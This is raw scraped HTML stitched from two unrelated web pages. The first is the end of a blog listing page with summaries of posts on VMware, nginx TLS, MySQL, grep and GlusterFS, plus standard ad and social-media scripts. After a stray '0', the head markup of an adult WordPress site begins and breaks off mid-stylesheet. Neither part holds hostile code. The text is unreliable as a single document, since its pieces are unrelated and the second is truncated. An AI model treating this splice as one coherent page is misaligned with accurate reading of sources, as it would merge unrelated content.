href="https://www.vionblog.com/vmware-6-5-cant-start-vm-host-crash/">VMware 6.5 can&#8217;t start VM after a host crash</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">October 18, 2018</span> <span class="entry-category"> in <a href="https://www.vionblog.com/general/" title="View all posts in General" >General</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>After a migration of a VM one of my host machines has become very unstable and freezes from time to&#8230; </p> <span><a href="https://www.vionblog.com/vmware-6-5-cant-start-vm-host-crash/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1683 https://www.vionblog.com/?p=1683">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1683 --> <div id="post-1673" class="clear post-1673 post type-post status-publish format-standard has-post-thumbnail hentry category-general tag-ssl"> <a class="thumbnail-link" href="https://www.vionblog.com/ssl-labs-perfect-score-nginx/"> <div class="thumbnail-wrap"> <img width="300" height="300" src="https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx-300x300.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx-300x300.png 300w, https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx-150x150.png 150w, https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx.png 500w" sizes="(max-width: 300px) 100vw, 300px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/ssl-labs-perfect-score-nginx/">SSL Labs Perfect Score for nginx</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">August 23, 2018</span> <span class="entry-category"> in <a href="https://www.vionblog.com/general/" title="View all posts in General" >General</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>Setting up TLS certificates on nginx this days is easy, but you should spend few more minutes and configure them&#8230; </p> <span><a href="https://www.vionblog.com/ssl-labs-perfect-score-nginx/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1673 https://www.vionblog.com/?p=1673">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1673 --> <div id="post-1668" class="clear post-1668 post type-post status-publish format-standard has-post-thumbnail hentry category-database tag-mysql"> <a class="thumbnail-link" href="https://www.vionblog.com/mysql-maintenance-tasks/"> <div class="thumbnail-wrap"> <img width="300" height="221" src="https://www.vionblog.com/wp-content/uploads/2012/09/MySQL_clr.gif" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="MySQL" srcset="https://www.vionblog.com/wp-content/uploads/2012/09/MySQL_clr.gif 500w, https://www.vionblog.com/wp-content/uploads/2012/09/MySQL_clr-300x221.gif 300w" sizes="(max-width: 300px) 100vw, 300px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/mysql-maintenance-tasks/">MySQL Maintenance Tasks</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">August 15, 2018</span> <span class="entry-category"> in <a href="https://www.vionblog.com/database/" title="View all posts in Database" >Database</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>You may notice that your database is not running as it use to, and you may think that it&#8217;s due&#8230; </p> <span><a href="https://www.vionblog.com/mysql-maintenance-tasks/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1668 https://www.vionblog.com/?p=1668">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1668 --> <div id="post-1654" class="clear post-1654 post type-post status-publish format-standard has-post-thumbnail hentry category-general"> <a class="thumbnail-link" href="https://www.vionblog.com/grep-word-recursively-file-extension/"> <div class="thumbnail-wrap"> <img width="150" height="150" src="https://www.vionblog.com/wp-content/uploads/2013/05/debian-logo.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Debian Logo" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/grep-word-recursively-file-extension/">grep word recursively in file extension</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">June 12, 2018</span> <span class="entry-category"> in <a href="https://www.vionblog.com/general/" title="View all posts in General" >General</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>Lately I&#8217;ve been cleaning a lot of WordPress websites from a lot of malware code and the simple way for&#8230; </p> <span><a href="https://www.vionblog.com/grep-word-recursively-file-extension/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1654 http://www.vionblog.com/?p=1654">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1654 --> <div id="post-1648" class="clear post-1648 post type-post status-publish format-standard has-post-thumbnail hentry category-development tag-zimbra"> <a class="thumbnail-link" href="https://www.vionblog.com/zimbra-network-service-error-occurred/"> <div class="thumbnail-wrap"> <img width="300" height="300" src="https://www.vionblog.com/wp-content/uploads/2018/05/zimbra-logo-color-square-300x300.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Zimbra Logo" srcset="https://www.vionblog.com/wp-content/uploads/2018/05/zimbra-logo-color-square-300x300.png 300w, https://www.vionblog.com/wp-content/uploads/2018/05/zimbra-logo-color-square-150x150.png 150w" sizes="(max-width: 300px) 100vw, 300px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/zimbra-network-service-error-occurred/">Zimbra: A network service error has occurred</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">May 22, 2018</span> <span class="entry-category"> in <a href="https://www.vionblog.com/development/" title="View all posts in Development" >Development</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>Lately from time to time on one of my Zimbra servers I was getting A network service error has occurred error&#8230; </p> <span><a href="https://www.vionblog.com/zimbra-network-service-error-occurred/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1648 http://www.vionblog.com/?p=1648">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1648 --> <div id="post-1617" class="clear post-1617 post type-post status-publish format-standard has-post-thumbnail hentry category-networking"> <a class="thumbnail-link" href="https://www.vionblog.com/upgrade-cisco-ios-on-cisco-6500-in-vss-mode/"> <div class="thumbnail-wrap"> <img width="200" height="200" src="https://www.vionblog.com/wp-content/uploads/2016/11/cisco_logo.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Cisco Logo" srcset="https://www.vionblog.com/wp-content/uploads/2016/11/cisco_logo.png 200w, https://www.vionblog.com/wp-content/uploads/2016/11/cisco_logo-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/upgrade-cisco-ios-on-cisco-6500-in-vss-mode/">Upgrade Cisco IOS on Cisco 6500 in VSS mode</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">November 8, 2016</span> <span class="entry-category"> in <a href="https://www.vionblog.com/networking/" title="View all posts in Networking" >Networking</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>If you are using the old Cisco 6500 probably as me need to upgrade the IOS o e new version&#8230;. </p> <span><a href="https://www.vionblog.com/upgrade-cisco-ios-on-cisco-6500-in-vss-mode/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1617 http://www.vionblog.com/?p=1617">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1617 --> <div id="post-1597" class="clear post-1597 post type-post status-publish format-standard has-post-thumbnail hentry category-networking tag-glusterfs tag-nfs"> <a class="thumbnail-link" href="https://www.vionblog.com/glusterfs-installation-and-configuration/"> <div class="thumbnail-wrap"> <img width="200" height="200" src="https://www.vionblog.com/wp-content/uploads/2016/03/glusterfs-logo.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="GlusterFS Logo" srcset="https://www.vionblog.com/wp-content/uploads/2016/03/glusterfs-logo.png 200w, https://www.vionblog.com/wp-content/uploads/2016/03/glusterfs-logo-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/glusterfs-installation-and-configuration/">GlusterFS Installation and Configuration</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">March 6, 2016</span> <span class="entry-category"> in <a href="https://www.vionblog.com/networking/" title="View all posts in Networking" >Networking</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>Here are few examples how to install GlusterFS on Debian like systems. Single node, add replica node, add multiple replicas&#8230; </p> <span><a href="https://www.vionblog.com/glusterfs-installation-and-configuration/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1597 http://www.vionblog.com/?p=1597">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1597 --> <div id="post-1582" class="clear post-1582 post type-post status-publish format-standard has-post-thumbnail hentry category-development tag-linux tag-selenium"> <a class="thumbnail-link" href="https://www.vionblog.com/selenium-headless-firefox-webdriver-using-pyvirtualdisplay/"> <div class="thumbnail-wrap"> <img width="200" height="200" src="https://www.vionblog.com/wp-content/uploads/2016/02/selinium.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="selinium logo" srcset="https://www.vionblog.com/wp-content/uploads/2016/02/selinium.png 200w, https://www.vionblog.com/wp-content/uploads/2016/02/selinium-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/selenium-headless-firefox-webdriver-using-pyvirtualdisplay/">Selenium Headless Firefox WebDriver using PyVirtualDisplay</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">February 16, 2016</span> <span class="entry-category"> in <a href="https://www.vionblog.com/development/" title="View all posts in Development" >Development</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>I needed to take screenshots from websites that i crawl and selenium headless webdriver is the right tool for me&#8230;. </p> <span><a href="https://www.vionblog.com/selenium-headless-firefox-webdriver-using-pyvirtualdisplay/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1582 http://www.vionblog.com/?p=1582">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1582 --> <div id="post-1572" class="clear post-1572 post type-post status-publish format-standard has-post-thumbnail hentry category-general tag-commands tag-linux"> <a class="thumbnail-link" href="https://www.vionblog.com/linux-find-text-in-file/"> <div class="thumbnail-wrap"> <img width="150" height="150" src="https://www.vionblog.com/wp-content/uploads/2013/05/debian-logo.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Debian Logo" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/linux-find-text-in-file/">Linux find text in file</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">February 12, 2016</span> <span class="entry-category"> in <a href="https://www.vionblog.com/general/" title="View all posts in General" >General</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>If you need to find text in file or multiple files on a Linux system you can use grep (global&#8230; </p> <span><a href="https://www.vionblog.com/linux-find-text-in-file/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1572 http://www.vionblog.com/?p=1572">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1572 --> <div id="post-1560" class="clear last post-1560 post type-post status-publish format-standard has-post-thumbnail hentry category-blogging tag-openx tag-revive"> <a class="thumbnail-link" href="https://www.vionblog.com/add-swiffy-html5-banner-to-revive-ad-server/"> <div class="thumbnail-wrap"> <img width="150" height="150" src="https://www.vionblog.com/wp-content/uploads/2015/09/revive-logo.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/add-swiffy-html5-banner-to-revive-ad-server/">Add Swiffy html5 banner to Revive AD Server</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">September 17, 2015</span> <span class="entry-category"> in <a href="https://www.vionblog.com/blogging/" title="View all posts in Blogging" >Blogging</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>Since Google announced that flash content will be autopause there is a tool you can use to convert Flash banners to html5, it&#8217;s&#8230; </p> <span><a href="https://www.vionblog.com/add-swiffy-html5-banner-to-revive-ad-server/#comments" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1560 http://www.vionblog.com/?p=1560">1 comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1560 --> </div><!-- #recent-content --> </main><!-- .site-main --> <nav class="navigation pagination" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><span class='page-numbers current'>1</span> <a class='page-numbers' href='https://www.vionblog.com/page/2/'>2</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='https://www.vionblog.com/page/8/'>8</a> <a class="next page-numbers" href="https://www.vionblog.com/page/2/">Next &raquo;</a></div> </nav> </div><!-- #primary --> <aside id="secondary" class="widget-area sidebar"> <!-- Start - HTML Javascript Adder plugin v3.9 --> <div id="html_javascript_adder-2" class="widget widget_html_javascript_adder"><h2 class="widget-title"><span>Facebook</span></h2> <div class="hjawidget textwidget"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.8&appId=1608491802800094"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-page" data-href="https://www.facebook.com/VionBlog/" data-small-header="false" data-adapt-container-width="true" data-hide-cover="true" data-show-facepile="true"><blockquote cite="https://www.facebook.com/VionBlog/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/VionBlog/">VION Technology Blog</a></blockquote></div> </div> </div><!-- End - HTML Javascript Adder plugin v3.9 --> <div id="recent-posts-widget-with-thumbnails-2" class="widget recent-posts-widget-with-thumbnails"><div id="rpwwt-recent-posts-widget-with-thumbnails-2" class="rpwwt-widget"> <h2 class="widget-title"><span>Latest</span></h2> <ul> <li><a href="https://www.vionblog.com/extending-lvm-volume/"><img width="75" height="75" src="https://www.vionblog.com/wp-content/uploads/2019/05/Debian-Logo-150x150.png" class="attachment-75x75 size-75x75 wp-post-image" alt="Debian Logo" srcset="https://www.vionblog.com/wp-content/uploads/2019/05/Debian-Logo-150x150.png 150w, https://www.vionblog.com/wp-content/uploads/2019/05/Debian-Logo.png 200w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Extending LVM Volume</span></a></li> <li><a href="https://www.vionblog.com/migrate-virtualbox-vmware-esxi-6-5/"><img width="75" height="75" src="https://www.vionblog.com/wp-content/uploads/2018/10/virtualbox-to-vmware-150x150.png" class="attachment-75x75 size-75x75 wp-post-image" alt="VirtualBox To VMware" srcset="https://www.vionblog.com/wp-content/uploads/2018/10/virtualbox-to-vmware-150x150.png 150w, https://www.vionblog.com/wp-content/uploads/2018/10/virtualbox-to-vmware.png 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Migrate VirtualBox to VMware ESXi 6.5</span></a></li> <li><a href="https://www.vionblog.com/vmware-6-5-cant-start-vm-host-crash/"><img width="75" height="75" src="https://www.vionblog.com/wp-content/uploads/2018/10/vmware-logo-150x150.png" class="attachment-75x75 size-75x75 wp-post-image" alt="" srcset="https://www.vionblog.com/wp-content/uploads/2018/10/vmware-logo-150x150.png 150w, https://www.vionblog.com/wp-content/uploads/2018/10/vmware-logo.png 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">VMware 6.5 can&#8217;t start VM after a host crash</span></a></li> <li><a href="https://www.vionblog.com/ssl-labs-perfect-score-nginx/"><img width="75" height="75" src="https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx-150x150.png" class="attachment-75x75 size-75x75 wp-post-image" alt="" srcset="https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx-150x150.png 150w, https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx-300x300.png 300w, https://www.vionblog.com/wp-content/uploads/2018/08/SSL-Labs-Perfect-Score-for-nginx.png 500w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">SSL Labs Perfect Score for nginx</span></a></li> <li><a href="https://www.vionblog.com/mysql-maintenance-tasks/"><img width="75" height="75" src="https://www.vionblog.com/wp-content/uploads/2012/09/MySQL_clr-150x150.gif" class="attachment-75x75 size-75x75 wp-post-image" alt="MySQL" /><span class="rpwwt-post-title">MySQL Maintenance Tasks</span></a></li> </ul> </div><!-- .rpwwt-widget --> </div> <!-- Start - HTML Javascript Adder plugin v3.9 --> <div id="html_javascript_adder-5" class="widget widget_html_javascript_adder"> <div class="hjawidget textwidget"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- vionblog.com_sidebar_top --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5953425441443210" data-ad-slot="4642218092" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div><!-- End - HTML Javascript Adder plugin v3.9 --> <div id="wpp-2" class="widget popular-posts"> <h2 class="widget-title"><span>Popular</span></h2> <script type="text/javascript"> document.addEventListener('DOMContentLoaded', function() { var wpp_widget_container = document.getElementById('wpp-2'); if ( 'undefined' != typeof WordPressPopularPosts ) { WordPressPopularPosts.get( wpp_params.ajax_url + 'widget', 'action=wpp_get_popular&id=2', function( response ){ wpp_widget_container.innerHTML += JSON.parse( response ).widget; var event = null; if ( 'function' === typeof(Event) ) { event = new Event( "wpp-onload", {"bubbles": true, "cancelable": false} ); } /* Fallback for older browsers */ else { if ( document.createEvent ) { event = document.createEvent('Event'); event.initEvent( "wpp-onload", true, false ); } } if ( event ) { wpp_widget_container.dispatchEvent( event ); } } ); } }); </script> </div> <!-- Start - HTML Javascript Adder plugin v3.9 --> <div id="html_javascript_adder-6" class="widget widget_html_javascript_adder"> <div class="hjawidget textwidget"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- vionblog.com_sidebar_bottom --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5953425441443210" data-ad-slot="5161092842" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div><!-- End - HTML Javascript Adder plugin v3.9 --> </aside><!-- #secondary --> </div><!-- #content .site-content --> <footer id="colophon" class="site-footer container"> <div class="clear"></div> <div id="site-bottom" class="clear"> <div class="site-info"> &copy; 2019 <a href="https://www.vionblog.com">VION Technology Blog</a> - Theme by <a href="https://www.happythemes.com/" target="_blank">HappyThemes</a> </div><!-- .site-info --> <div class="menu-pages-container"><ul id="footer-menu" class="footer-nav"><li id="menu-item-1278" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1278"><a href="https://www.vionblog.com/downloads/">Downloads</a></li> <li id="menu-item-1279" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1279"><a href="https://www.vionblog.com/about/">About</a></li> <li id="menu-item-1280" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1280"><a href="https://www.vionblog.com/privacy/">Privacy</a></li> <li id="menu-item-1281" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1281"><a href="https://www.vionblog.com/contact/">Contact</a></li> </ul></div> </div><!-- #site-bottom --> </footer><!-- #colophon --> </div><!-- #page --> <!-- WP Socializer 3.3.4 - JS - Start --> <script>var wpsr_ajax_url = "https://www.vionblog.com/wp-admin/admin-ajax.php";</script> <!-- WP Socializer - JS - End --> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"vionblog"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.vionblog.com/wp-content/plugins/disqus-comment-system/public/js/comment_count.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-content/themes/mysocial/assets/js/superfish.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-content/themes/mysocial/assets/js/modernizr.min.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-content/themes/mysocial/assets/js/html5.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-content/themes/mysocial/assets/js/jquery.custom.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-content/plugins/wp-socializer/public/js/wp-socializer.min.js'></script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Application Monitoring using New Relic Served from: vionblog.com @ 2019-05-16 18:30:07 by W3 Total Cache -->
0
<!DOCTYPE html> <html class="no-js" lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://mybigtitsbabes.com/xmlrpc.php"> <title>mybigtitsbabes &#8211; enjoy large natural breasts and nude babes with big tits</title> <script>document.documentElement.className = document.documentElement.className.replace("no-js","js");</script> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="mybigtitsbabes &raquo; Feed" href="http://mybigtitsbabes.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="mybigtitsbabes &raquo; Comments Feed" href="http://mybigtitsbabes.com/comments/feed/" /> <link href="//fonts.googleapis.com/css?family=Roboto+Condensed:400,300italic,300,400italic,700&subset=latin,latin-ext" rel="stylesheet" type="text/css"> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mybigtitsbabes.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.2"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='cptch_stylesheet-css' href='http://mybigtitsbabes.com/wp-content/plugins/captcha/css/front_end_style.css?ver=4.2.9' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='http://mybigtitsbabes.com/wp-includes/css/dashicons.min.css?ver=4.7.2' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_mobile_style-css' href='http://mybigtitsbabes.com/wp-content/plugins/captcha/css/mobile_style.css?ver=4.2.9' type='text/css' media='all' /> <link rel='stylesheet' id='gdrts-font-css' href='http://mybigtitsbabes.com/wp-content/plugins/gd-rating-system/font/styles.css?ver=1.2.290' type='text/css' media='all' /> <link rel='stylesheet' id='gdrts-gridism-css' href='http://mybigtitsbabes.com/wp-content/plugins/gd-rating-system/css/gridism.css?ver=1.2.290' type='text/css' media='all' /> <link rel='stylesheet' id='gdrts-rating-css' href='http://mybigtitsbabes.com/wp-content/plugins/gd-rating-system/css/rating.min.css?ver=1.2.290' type='text/css' media='all' /> <link rel='stylesheet' id='style-css' href='http://mybigtitsbabes.com/wp-content/themes/typecore-master/style.css?ver=4.7.2' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-css' href='http://mybigtitsbabes.com/wp-content/themes/typecore-master/responsive.css?ver=4.7.2' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='http://mybigtitsbabes.com/wp-content/themes/typecore-master/fonts/font-awesome.min.css?ver=4.7.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack-top-posts-widget-css' href='http://mybigtitsbabes.com/wp-content/plugins/jetpack/modules/widgets/top-posts/style.css?ver=20141013' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='http://mybigtitsbabes.com/wp-content/plugins/jetpack/css/jetpack.css?ver=4.0.2' type='text/css' media='all' /> <script type='text/javascript' src='http://mybigtitsbabes.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://mybigtitsbabes.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://mybigtitsbabes.com/wp-content/themes/typecore-master/js/jquery.flexslider.min.js?ver=4.7.2'></script> <link rel='https://api.w.org/' href='http://mybigtitsbabes.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://mybigtitsbabes.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://mybigtitsbabes.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.7.2" /> <!--[if lt IE 9]> <script src="http://mybigtitsbabes.com/wp-content/themes/typecore-master/js/ie/html5.js"></script> <script src="http://mybigtitsbabes.com/wp-content/themes/typecore-master/js/ie/selectivizr.js"></script> <![endif]--> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="mybigtitsbabes" /> <meta property="og:description" content="enjoy large natural breasts and nude babes with big tits" /> <meta property="og:url" content="http://mybigtitsbabes.com/" /> <meta property="og:site_name" content="mybigtitsbabes" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:site" content="@big titsblog" /> <style type="text/css"> /* Dynamic CSS: For no styles in head, copy and put the css below in your custom.css or child theme's style.css, disable dynamic styles */ body { font-family: "Roboto Condensed", Arial, sans-serif; } .container-inner { max-width: 1600px; } .sidebar .widget { padding-left: 20px; padding-right: 20px; } ::selection { background-color: #5ba8db; } ::-moz-selection { background-color: #5ba8db; } a, .themeform label .required, #flexslider-featured .flex-direction-nav .flex-next:hover, #flexslider-featured .flex-direction-nav .flex-prev:hover, .post-hover:hover .post-title a, .post-title a:hover, .post-nav li a:hover i, .post-nav li a:hover span, .sidebar .post-nav li a:hover i, .sidebar .post-nav li 